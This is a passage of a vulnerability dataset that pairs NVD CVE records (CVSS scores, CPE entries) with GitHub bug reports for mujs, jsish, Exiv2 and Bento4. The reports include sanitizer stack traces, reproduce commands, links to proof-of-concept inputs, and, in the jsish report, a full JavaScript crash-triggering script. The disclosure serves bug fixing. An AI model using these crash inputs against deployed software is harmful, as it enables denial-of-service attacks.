/home/node/xmujs/jsgc.c:77 #243 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #244 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #245 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #246 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #247 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #248 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #249 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #250 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #251 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 SUMMARY: AddressSanitizer: stack-overflow /home/node/xmujs/jsgc.c:76 jsG_markproperty ==19628==ABORTING ```
stack overflow
https://api.github.com/repos/ccxvii/mujs/issues/134/comments
3
2020-04-17T14:17:17Z
2020-05-27T10:38:52Z
https://github.com/ccxvii/mujs/issues/134
602,009,320
134
2,184
CVE-2020-22907
2021-07-13T15:15:08.677
Stack overflow vulnerability in function jsi_evalcode_sub in jsish before 3.0.18, allows remote attackers to cause a Denial of Service via a crafted value to the execute parameter.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/pcmacdon/jsish/issues/16" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/pcmacdon/jsish/issues/16" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jsish:jsish:*:*:*:*:*:*:*:*", "matchCriteriaId": "F570B531-5AC9-4DD1-AFE7-8C24B969CDF0", "versionEndExcluding": "3.0.18", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/pcmacdon/jsish/issues/16
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "pcmacdon", "jsish" ]
# Enviroment ``` operating system: ubuntu18.04 compile command: export JSI__SANITIZE=1 && make test command: ./jsish poc1 ``` # poc: ``` function fail(message) { } function assert(condition, message) { if (!condition) fail(message); } function assertEquals(expression, value, message) { if (expression != value) { expression = ('' + expression).replace(/[\r\n]+/g, ')aOD$,0ZA>`W[oxl~4zXIG'); value = ('' + value).replace(/\r?\n/g, '^A-}nr4+Cnb-(+`2M,'); var FDwc = Proxy; fail('' + value + '' + expression + ';W' + message); } } var d; d = null; var jWeN = assert(null, null); var QJmz = JSON; for (var i = 0; i < loops; i += 1) { d = new Date(); d = new function (x) { return { toString: function () { return x.toString(); } }; }(d.valueOf()); var sDPa = new Map([ [null], [ null, null, null, null ] ]); d = d.parentNode; assert(null, null); var pxeM = Proxy; var bsAF = assert(null, null); } ``` # vulnerability description Below is the ASAN output, We can find that the code has a heap overflow in jsi_evalcode_sub src/jsiEval.c:1325 ![image](https://user-images.githubusercontent.com/13704697/82460503-d2a14d80-9aeb-11ea-8ff2-062494e69fa2.png) ![image](https://user-images.githubusercontent.com/13704697/82460527-db921f00-9aeb-11ea-9942-48d42d6470f2.png)
heap overflow
https://api.github.com/repos/pcmacdon/jsish/issues/16/comments
2
2020-05-20T14:49:25Z
2020-05-20T17:01:44Z
https://github.com/pcmacdon/jsish/issues/16
621,824,597
16
2,185
CVE-2020-19716
2021-07-13T22:15:08.913
A buffer overflow vulnerability in the Databuf function in types.cpp of Exiv2 v0.27.1 leads to a denial of service (DOS).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/Exiv2/exiv2/issues/980" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00013.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/Exiv2/exiv2/issues/980" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00013.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:exiv2:exiv2:0.27.1:*:*:*:*:*:*:*", "matchCriteriaId": "9E196C7D-A075-43E0-A620-C2D7C0EB559F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "120" ]
120
https://github.com/Exiv2/exiv2/issues/980
[ "Third Party Advisory" ]
github.com
[ "Exiv2", "exiv2" ]
There is a buffer overflow in exiv2 in file types.cpp. Distributor ID: Ubuntu Description: Ubuntu 16.04.6 LTS Release: 16.04 Codename: xenial gcc: 5.4.0 The compile command is: cmake ./ ;make To reproduce the issue, run: ./exiv2 input Here is the trace reported by asan: #0 0x7faff55ba631 (/usr/lib/x86_64-linux-gnu/libasan.so.2+0xa0631) #1 0x7faff55bf5e3 in __sanitizer::CheckFailed(char const*, int, char const*, unsigned long long, unsigned long long) (/usr/lib/x86_64-linux-gnu/libasan.so.2+0xa55e3) #2 0x7faff5537425 (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x1d425) #3 0x7faff55bd865 (/usr/lib/x86_64-linux-gnu/libasan.so.2+0xa3865) #4 0x7faff553cb4d (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x22b4d) #5 0x7faff55b367e in operator new[](unsigned long) (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x9967e) #6 0x7faff0f63d25 in Exiv2::DataBuf::DataBuf(long) /home/heqing/playground/exiv2-0.27.1-Source-a/src/types.cpp:141 #7 0x7faff0dc8995 in Exiv2::RafImage::readMetadata() /home/heqing/playground/exiv2-0.27.1-Source-a/src/rafimage.cpp:300 #8 0x77b36d in Action::Print::printSummary() /home/heqing/playground/exiv2-0.27.1-Source-a/src/actions.cpp:286 #9 0x79935f in Action::Print::run(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&) /home/heqing/playground/exiv2-0.27.1-Source-a/src/actions.cpp:246 #10 0x410f18 in main /home/heqing/playground/exiv2-0.27.1-Source-a/src/exiv2.cpp:169 #11 0x7fafecfe282f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #12 0x41abb8 in _start (/home/heqing/playground/exiv2-0.27.1-Source-a/build/bin/exiv2+0x41abb8) The reason is that DataBuf in types.cpp does not check the malloced buffer is a null pointer or not yet directly use memcpy to write the buffer. ![image](https://user-images.githubusercontent.com/7632714/62766397-f8adb200-bac4-11e9-9e03-ba121760f6bc.png) The attachment is the poc input. [poc_input2.zip](https://github.com/Exiv2/exiv2/files/3485483/poc_input2.zip)
Buffer overflow caused by exhaustive memory usage
https://api.github.com/repos/Exiv2/exiv2/issues/980/comments
4
2019-08-09T08:46:00Z
2021-07-23T12:12:29Z
https://github.com/Exiv2/exiv2/issues/980
478,871,751
980
2,186
CVE-2020-19717
2021-07-13T22:15:08.943
An unhandled memory allocation failure in Core/Ap48bdlAtom.cpp of Bento 1.5.1-628 causes a NULL pointer dereference, leading to a denial of service (DOS).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/416" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/416" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:axiosys:bento4:1.5.1-628:*:*:*:*:*:*:*", "matchCriteriaId": "27A2EAA1-1740-4A14-BFFC-BD4406E9BD87", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/axiomatic-systems/Bento4/issues/416
[ "Exploit", "Third Party Advisory" ]
github.com
[ "axiomatic-systems", "Bento4" ]
There is a null pointer dereference caused by unhandled exhaustive memory usage in Ap48bdlAtom.cpp. Distributor ID: Ubuntu Description: Ubuntu 16.04.6 LTS Release: 16.04 Codename: xenial gcc: 5.4.0 To reproduce the bug, compile the project with flag DCMAKE_C_FLAGS=-g -m32 -fsanitize=address,undefined then run: ./mp42aac input /dev/null The reason is that the malloc size does not check and easily lead to memory allocation failure. ![image](https://user-images.githubusercontent.com/7632714/62784397-f5302000-baf0-11e9-8876-4dc122aa9d11.png) ![image](https://user-images.githubusercontent.com/7632714/62784507-388a8e80-baf1-11e9-8a23-5b066cdbaedd.png) Here is the trace reported by ASAN: ==131030==WARNING: AddressSanitizer failed to allocate 0xffe1fff1 bytes ==131030==AddressSanitizer's allocator is terminating the process instead of returning 0 ==131030==If you don't like this behavior set allocator_may_return_null=1 ==131030==AddressSanitizer CHECK failed: ../../../../../src/libsanitizer/sanitizer_common/sanitizer_allocator.cc:147 "((0)) != (0)" (0x0, 0x0) #0 0xf71fe797 (/usr/lib32/libasan.so.2+0x9f797) #1 0xf7203a69 in __sanitizer::CheckFailed(char const*, int, char const*, unsigned long long, unsigned long long) (/usr/lib32/libasan.so.2+0xa4a69) #2 0xf717507b (/usr/lib32/libasan.so.2+0x1607b) #3 0xf7201e80 (/usr/lib32/libasan.so.2+0xa2e80) #4 0xf717a229 (/usr/lib32/libasan.so.2+0x1b229) #5 0xf71f6e16 in operator new[](unsigned int) (/usr/lib32/libasan.so.2+0x97e16) #6 0x877ebaf in AP4_DataBuffer::AP4_DataBuffer(unsigned int) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4DataBuffer.cpp:55 #7 0x8ba5673 in AP4_8bdlAtom::AP4_8bdlAtom(unsigned int, AP4_ByteStream&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap48bdlAtom.cpp:76 #8 0x8ba5673 in AP4_8bdlAtom::Create(unsigned int, AP4_ByteStream&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap48bdlAtom.cpp:64 #9 0x82e10dc in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4AtomFactory.cpp:534 #10 0x8301ca3 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4AtomFactory.cpp:225 #11 0x82b6bae in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4ContainerAtom.cpp:194 #12 0x82b6bae in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4ContainerAtom.cpp:139 #13 0x841a898 in AP4_MoovAtom::AP4_MoovAtom(unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4MoovAtom.cpp:80 #14 0x82e2631 in AP4_MoovAtom::Create(unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4MoovAtom.h:56 #15 0x82e2631 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4AtomFactory.cpp:363 #16 0x82fa1f7 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4AtomFactory.cpp:225 #17 0x82fa1f7 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, AP4_Atom*&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4AtomFactory.cpp:151 #18 0x809a044 in AP4_File::ParseStream(AP4_ByteStream&, AP4_AtomFactory&, bool) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4File.cpp:104 #19 0x809a044 in AP4_File::AP4_File(AP4_ByteStream&, bool) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4File.cpp:78 #20 0x8082ce7 in main /mnt/data/playground/mp42-a/Source/C++/Apps/Mp42Aac/Mp42Aac.cpp:250 #21 0xf697f636 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x18636) #22 0x808df1b (/mnt/data/playground/mp42-patch/Build/mp42aac+0x808df1b) The poc input: [poc_input6.zip](https://github.com/axiomatic-systems/Bento4/files/3486674/poc_input6.zip)
Null pointer dereference caused by unhandled exhaustive memory usage
https://api.github.com/repos/axiomatic-systems/Bento4/issues/416/comments
0
2019-08-09T14:02:54Z
2019-08-25T16:22:18Z
https://github.com/axiomatic-systems/Bento4/issues/416
479,003,776
416
2,187
CVE-2020-19718
2021-07-13T22:15:08.967
An unhandled memory allocation failure in Core/Ap4Atom.cpp of Bento 1.5.1-628 causes a NULL pointer dereference, leading to a denial of service (DOS).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/417" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/417" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:axiosys:bento4:1.5.1-628:*:*:*:*:*:*:*", "matchCriteriaId": "27A2EAA1-1740-4A14-BFFC-BD4406E9BD87", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/axiomatic-systems/Bento4/issues/417
[ "Exploit", "Third Party Advisory" ]
github.com
[ "axiomatic-systems", "Bento4" ]
There is a null pointer dereference bug running mp42aac. It is similar to #413. Distributor ID: Ubuntu Description: Ubuntu 16.04.6 LTS Release: 16.04 Codename: xenial gcc: 5.4.0 To reproduce the bug, compile the project with flag DCMAKE_C_FLAGS=-g -m32 -fsanitize=address,undefined then run: ./mp42aac input /dev/null The reason for this problem is due to the mishandled memory allocation: ![image](https://user-images.githubusercontent.com/7632714/62785850-04649d00-baf4-11e9-8335-b8f42ab92b45.png) Here is the trace reported by ASAN: /mnt/data/playground/mp42-a/Source/C++/Core/Ap4DataBuffer.cpp:175:41: runtime error: null pointer passed as argument 1, which is declared to never be null /usr/include/i386-linux-gnu/bits/string3.h:53:71: runtime error: null pointer passed as argument 1, which is declared to never be null ==147453==WARNING: AddressSanitizer failed to allocate 0xfffffff8 bytes ==147453==AddressSanitizer's allocator is terminating the process instead of returning 0 ==147453==If you don't like this behavior set allocator_may_return_null=1 ==147453==AddressSanitizer CHECK failed: ../../../../../src/libsanitizer/sanitizer_common/sanitizer_allocator.cc:147 "((0)) != (0)" (0x0, 0x0) #0 0xf72aa797 (/usr/lib32/libasan.so.2+0x9f797) #1 0xf72afa69 in __sanitizer::CheckFailed(char const*, int, char const*, unsigned long long, unsigned long long) (/usr/lib32/libasan.so.2+0xa4a69) #2 0xf722107b (/usr/lib32/libasan.so.2+0x1607b) #3 0xf72ade80 (/usr/lib32/libasan.so.2+0xa2e80) #4 0xf7226229 (/usr/lib32/libasan.so.2+0x1b229) #5 0xf72a2e16 in operator new[](unsigned int) (/usr/lib32/libasan.so.2+0x97e16) #6 0x877ebaf in AP4_DataBuffer::AP4_DataBuffer(unsigned int) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4DataBuffer.cpp:55 #7 0x889fddb in AP4_HvccAtom::Create(unsigned int, AP4_ByteStream&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4HvccAtom.cpp:86 #8 0x82dc364 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4AtomFactory.cpp:488 #9 0x82fa1f7 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4AtomFactory.cpp:225 #10 0x82fa1f7 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, AP4_Atom*&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4AtomFactory.cpp:151 #11 0x809a044 in AP4_File::ParseStream(AP4_ByteStream&, AP4_AtomFactory&, bool) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4File.cpp:104 #12 0x809a044 in AP4_File::AP4_File(AP4_ByteStream&, bool) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4File.cpp:78 #13 0x8082ce7 in main /mnt/data/playground/mp42-a/Source/C++/Apps/Mp42Aac/Mp42Aac.cpp:250 #14 0xf6a2b636 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x18636) #15 0x808df1b (/mnt/data/playground/mp42-patch/Build/mp42aac+0x808df1b) This is the POC input: [poc_input7.zip](https://github.com/axiomatic-systems/Bento4/files/3486744/poc_input7.zip)
Null pointer dereference bug
https://api.github.com/repos/axiomatic-systems/Bento4/issues/417/comments
0
2019-08-09T14:25:13Z
2019-08-25T16:22:03Z
https://github.com/axiomatic-systems/Bento4/issues/417
479,014,683
417
2,188
CVE-2020-19719
2021-07-13T22:15:09.000
A buffer overflow vulnerability in Ap4ElstAtom.cpp of Bento 1.5.1-628 leads to a denial of service (DOS).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/414" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/414" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:axiosys:bento4:1.5.1-628:*:*:*:*:*:*:*", "matchCriteriaId": "27A2EAA1-1740-4A14-BFFC-BD4406E9BD87", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "120" ]
120
https://github.com/axiomatic-systems/Bento4/issues/414
[ "Exploit", "Third Party Advisory" ]
github.com
[ "axiomatic-systems", "Bento4" ]
There is a buffer overflow in Ap4ElstAtom.cpp related to AP4_ElstAtom. Distributor ID: Ubuntu Description: Ubuntu 16.04.6 LTS Release: 16.04 Codename: xenial gcc: 5.4.0 To reproduce the bug, compile the project with flag `DCMAKE_C_FLAGS=-g -m32 -fsanitize=address,undefined` then run: `./mp42aac input /dev/null` This is the trace reported by ASAN: ==89902==ERROR: AddressSanitizer: heap-buffer-overflow on address 0xf4b00b64 at pc 0x086bc1e3 bp 0xff8c68b8 sp 0xff8c68a8 WRITE of size 20 at 0xf4b00b64 thread T0 #0 0x86bc1e2 in AP4_Array<AP4_ElstEntry>::Append(AP4_ElstEntry const&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4ElstAtom.cpp:88 #1 0x86bc1e2 in AP4_ElstAtom::AP4_ElstAtom(unsigned int, unsigned char, unsigned int, AP4_ByteStream&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4ElstAtom.cpp:84 #2 0x86bccb5 in AP4_ElstAtom::Create(unsigned int, AP4_ByteStream&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4ElstAtom.cpp:51 #3 0x82e1ccc in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4AtomFactory.cpp:549 #4 0x8301ca3 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4AtomFactory.cpp:225 #5 0x82b6bae in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4ContainerAtom.cpp:194 #6 0x82b6bae in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4ContainerAtom.cpp:139 #7 0x82be680 in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4ContainerAtom.cpp:88 #8 0x82dc711 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4AtomFactory.cpp:768 #9 0x8301ca3 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4AtomFactory.cpp:225 #10 0x82b6bae in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4ContainerAtom.cpp:194 #11 0x82b6bae in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4ContainerAtom.cpp:139 #12 0x901195b in AP4_TrakAtom::AP4_TrakAtom(unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4TrakAtom.cpp:165 #13 0x82da849 in AP4_TrakAtom::Create(unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4TrakAtom.h:58 #14 0x82da849 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4AtomFactory.cpp:383 #15 0x8301ca3 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4AtomFactory.cpp:225 #16 0x82b6bae in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4ContainerAtom.cpp:194 #17 0x82b6bae in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4ContainerAtom.cpp:139 #18 0x841a898 in AP4_MoovAtom::AP4_MoovAtom(unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4MoovAtom.cpp:80 #19 0x82e2631 in AP4_MoovAtom::Create(unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4MoovAtom.h:56 #20 0x82e2631 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4AtomFactory.cpp:363 #21 0x82fa1f7 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) 